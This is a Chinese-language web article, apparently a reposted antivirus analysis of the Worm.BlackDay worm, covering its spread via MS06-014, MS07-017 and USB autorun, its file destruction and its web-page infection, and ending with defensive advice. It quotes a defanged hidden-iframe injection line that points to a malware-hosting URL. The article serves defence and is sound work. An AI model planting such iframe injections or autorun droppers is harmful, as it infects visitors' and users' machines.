专家谈Worm.BlackDay病毒分析报告

今日一朋友问起“末日阴影”，还以为是哪部好莱坞大片，细看下来，原来就是Worm/BlackDay这个“老”蠕虫。其实这个蠕虫在四月初就出现了，被冠了这么个噱头名字。

目前这个病毒会影响到除Windows Vista外所有的Windows版本。病毒程序运行后会破坏正常文件，感染网页文件，通过MS06-014和MS07-017漏洞传播, 且被病毒破坏的文件无法修复，这点比较危险。

1、当系统中毒后，所有可执行文件图标都变成了一个黑色炸弹的图标，如下图：

用户一旦感染该病毒，电脑会自动弹出一个病毒作者的留言框：

2、病毒体内有如下字样：

I can't change my sanguinary inbeing,never.I canfeel that the tears come by my face.Kill 

my self is the best,maybe.so Please.

My Name:wswhacker My age:17

I feeling free when I am not in prison.Can you feel my word?

（但此段文字在不同的版本里会有些许不同。）

3、该病毒会遍历本地磁盘、可移动磁盘等存贮介质，发现有*.asp *.aspx *.php *.jsp *.htm *.html扩展名的脚本文件时进行感染：

在这些网页脚本文件中插入一个Iframe标签，添加恶意网址引用：

(iframe src="hxxp://www.d***youxi.net/Black-Day.htm" width=0 height=0)(/iframe)

当用户打开这些网页文件时，IE就会自动下载蠕虫病毒。

（既然病毒目标是所有本地磁盘，查杀时就要注意全盘扫描。）

4、发现如下扩展名的文件时，将病毒体内容覆盖到文件首部，使文件被破坏，无法恢复：

.exe .msc .dll .scr .pif .com

发现如下扩展名的文件时跳过：

.lnk

对于其他文件，当文件大小小于258048(病毒体大小)时，覆盖文件，否则跳过。感染后的文件末尾加如下感染标志：wswhacker。

5、在每个磁盘根目录下创建如下病毒文件，双击盘符时激活病毒：

autorun.inf

BLACK-DAY.EXE

这样就可以借助U盘，MP3，移动硬盘等移动存储介质传播。

此病毒虽然对文件的破坏力比较强，好在传染性一般。目前还没有大规模的中毒报告。

建议开启文件、网页等监控，可以随时监控病毒对上述文件实施的更改操作。插入移动存储后，扫描移动磁盘后再运行文件。

【提示：为安全起见，文中用“*”代替了部分网址，并更改了Iframe标签格式。】

关键词：

【推荐给好友】【关闭】

最新五条评论

查看全部评论

评论总数 0 条

您的评论

用户名： （新注册） 密　码： 匿名：

·用户发表意见仅代表其个人意见，并且承担一切因发表内容引起的纠纷和责任
·本站管理人员有权在不通知用户的情况下删除不符合规定的评论信息或留做证据
·请客观的评价您所看到的资讯，提倡就事论事，杜绝漫骂和人身攻击等不文明行为

标签：

版权申明：本站文章部分自网络，如有侵权，请联系：west999com@outlook.com
特别注意：本站所有转载文章言论不代表本站观点，本站所提供的摄影照片，插画，设计作品，如需使用，请与原作者联系，版权归原作者所有